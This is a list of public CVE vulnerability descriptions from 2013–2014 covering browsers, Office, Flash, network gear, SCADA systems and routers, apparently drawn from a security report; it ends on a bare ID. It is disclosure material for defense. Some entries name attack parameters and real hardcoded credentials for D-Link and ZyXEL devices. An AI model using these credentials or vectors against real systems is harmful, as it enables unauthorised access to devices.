CVE-2013-2824: Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.

CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.

CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability".

CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.

CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.

CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.

CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.

CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.

CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".

CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability".

CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help URL that triggers loading of hxds.dll.

CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability".

CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability".

CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.

CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.

CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.

CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.

CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to /filesystem.

CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.

CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability".

CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.

CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.

CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1 and 6.2.2 before IF 8, and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1 and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.

CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.

CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.

CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.

CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.

CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.

CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.

CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.

CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.

CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.

CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability".

CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.

CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.

CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.

CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.

CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.

CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.

CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44, DSR-150N with firmware before 1.05B64, DSR-250 and DSR-250N with firmware before 1.08B44, and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.

CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.

CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.

CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster, Page 22 of 28

CVE-2014-0001
Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.

CVE-2014-0035
The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-0160
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0207
The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.

CVE-2014-0259
Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".

CVE-2014-0266
The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability".

CVE-2014-0294
Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability".

CVE-2014-0313
Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-0321.

CVE-2014-0354
The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.

CVE-2014-0362
Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.

CVE-2014-0433
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.

CVE-2014-0488
APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.

CVE-2014-0493
Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.

CVE-2014-0494
Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.

CVE-2014-0498
Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X, and before 11.2.202.341 on Linux; Adobe AIR before 4.0.0.1628 on Android; Adobe AIR SDK before 4.0.0.1628; and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.

CVE-2014-0515
Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.

CVE-2014-0533
Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

CVE-2014-0536
Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

CVE-2014-0562
Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)".

CVE-2014-0577
Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion", a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.

CVE-2014-0765
Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.

CVE-2014-0767
Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.

CVE-2014-0783
Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.

CVE-2014-1330
WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1342
WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1349
Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.

CVE-2014-1356
Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.

CVE-2014-1370
The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.

CVE-2014-1379
Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.

CVE-2014-1382
WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.

CVE-2014-1466
SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.

CVE-2014-1472
Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2014-1477
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1518
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1563
Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.

CVE-2014-1565
The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586
content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

CVE-2014-1701
The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget.dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740
Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

CVE-2014-1744
Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753
Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-1806
The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability".

CVE-2014-1808
Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability".

CVE-2014-1811
The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability".

CVE-2014-1812
The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability".

CVE-2014-2014
imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.

CVE-2014-2103
Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

CVE-2014-2109
The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

CVE-2014-2364
Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.

CVE-2014-2416
Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.

CVE-2014-2554
OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.

CVE-2014-2643
Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.

CVE-2014-2742
Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.

CVE-2014-2768
Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2773.

CVE-2014-2789
Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.

CVE-2014-2791
Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-2794
Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2788.

CVE-2014-2808
Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821
Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-3444
The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.

CVE-2014-3489
lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507
Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556
The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.

CVE-2014-3580
The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814
The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819
Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872
Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044
OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082
Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4100
